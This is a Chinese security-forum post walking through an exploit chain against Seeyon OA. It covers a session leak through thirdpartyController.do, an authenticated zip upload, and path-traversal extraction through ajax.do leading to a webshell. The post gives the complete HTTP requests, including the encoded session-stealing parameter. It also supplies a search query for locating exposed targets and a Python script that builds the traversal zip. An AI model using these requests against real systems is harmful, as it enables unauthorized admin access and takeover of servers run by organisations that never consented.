致远OA thirdpartyController.do Session泄露 任意文件上传漏洞

camer   ·   发表于 2023-05-05 16:37:56   ·   漏洞文章

漏洞描述:

致远OA通过发送特殊请求获取session,在通过文件上传接口上传webshell控制服务器

网络测绘:

title="致远"

漏洞复现:

流程:
首先是构造数据包获取管理cookie值,然后携带cookie值上传压缩文件并进行解压,达到getshell的目的。
1、获取cookie

  1. POST /seeyon/thirdpartyController.do HTTP/1.1
  2. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  3. Upgrade-Insecure-Requests: 1
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
  5. Connection: close
  6. Accept-Encoding: gzip, deflate
  7. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  8. DNT: 1
  9. Content-Type: application/x-www-form-urlencoded
  10. Host:
  11. Content-Length: 112
  12. method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4


2、上传压缩包

  1. POST /seeyon/fileUpload.do?method=processUpload&maxSize HTTP/1.1
  2. Content-Type: multipart/form-data; boundary=00content0boundary00
  3. Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
  4. User-Agent: Java/1.8.0_101
  5. Host:
  6. Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
  7. Content-Length: 975
  8. Connection: close
  9. --00content0boundary00
  10. Content-Disposition: form-data; name="type"
  11. --00content0boundary00
  12. Content-Disposition: form-data; name="extensions"
  13. --00content0boundary00
  14. Content-Disposition: form-data; name="applicationCategory"
  15. --00content0boundary00
  16. Content-Disposition: form-data; name="destDirectory"
  17. --00content0boundary00
  18. Content-Disposition: form-data; name="destFilename"
  19. --00content0boundary00
  20. Content-Disposition: form-data; name="maxSize"
  21. --00content0boundary00
  22. Content-Disposition: form-data; name="isEncrypt"
  23. --00content0boundary00
  24. Content-Disposition: form-data; name="file1"; filename="test.zip"
  25. Content-Type: application/x-zip-compressed
  26. zip文件
  27. --00content0boundary00--


携带cookie上传压缩包之后,返回压缩包的一个id标识
注:这边巨坑,实际测试上传的时候,压缩包内文件只能是数字,超过10也无法解压,并且有时候压缩包必须存在layout.xml 文件(空内容即可)否则在利用解压漏洞时会解压失败

3、解压

  1. POST /seeyon/ajax.do HTTP/1.1
  2. Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
  3. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  4. User-Agent: Java/1.8.0_101
  5. Host:
  6. Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
  7. Content-Length: 142
  8. Connection: close
  9. method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2023-02-05","-6448544356250399451"]


4、测试上传结果

注:压缩包生成文件

  1. import zipfile
  2. zf=zipfile.ZipFile('test.zip', mode='a', compression=zipfile.ZIP_DEFLATED)
  3. fname=f'..\\1.txt'
  4. shellcode="c9b3995f-2d74-448d-a742-34f72cfa1e14"
  5. zf.writestr('layout.xml', "")
  6. zf.writestr(fname, shellcode)
用户名金币积分时间理由
Track-子羽 10.00 0 2023-05-09 17:05:42 一个受益终生的帖子~~

打赏我,让我更有动力~

0 条回复   |  直到 2023-5-5 | 1892 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.